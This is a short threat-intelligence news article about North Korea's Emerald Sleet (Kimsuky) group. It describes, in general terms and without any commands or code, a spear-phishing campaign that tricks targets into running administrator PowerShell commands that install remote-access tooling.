North Korean state-sponsored cyber group known as Emerald Sleet aka Kimsuky or Velvet Chollima has adopted a new tactic to infiltrate its targets, which involves the threat actor tricking individuals into executing PowerShell commands as administrators, enabling the installation of malicious software and allowing for remote access to the compromised system.
Emerald Sleet has historically focused on a broad range of targets, including government agencies, NGOs, media outlets, and individuals linked to international diplomacy. The group has conducted operations against victims across North America, South America, Europe, and East Asia, with a particular emphasis on individuals involved with Northeast Asian affairs.
According to Microsoft Threat Intelligence, the group's new tactic involves a multifaceted spear-phishing attack designed to establish trust before delivering the malicious payload.
The attack begins with the threat actor impersonating a South Korean government official, cultivating a relationship with the target over time.
Once trust is established, the attacker sends a spear-phishing email containing a PDF attachment. In order to view the contents of the PDF, the target is asked to click on a URL that directs them to a device registration page. Here, the victim is instructed to open PowerShell as an administrator and paste a series of commands provided by the threat actor.
If the target follows through and executes the code, the attacker gains the ability to install a browser-based remote desktop tool. The code also downloads a certificate file and hardcoded PIN from a remote server. This combination allows Emerald Sleet to register the victim’s device on their server, granting them the ability to remotely control the system and exfiltrate sensitive data.
Microsoft said it has observed a limited number of attacks utilizing this new tactic since the start of 2025.
“While we have only observed the use of this tactic in limited attacks since January 2025, this shift is indicative of a new approach to compromising their traditional espionage targets,” the threat intelligence team warned.
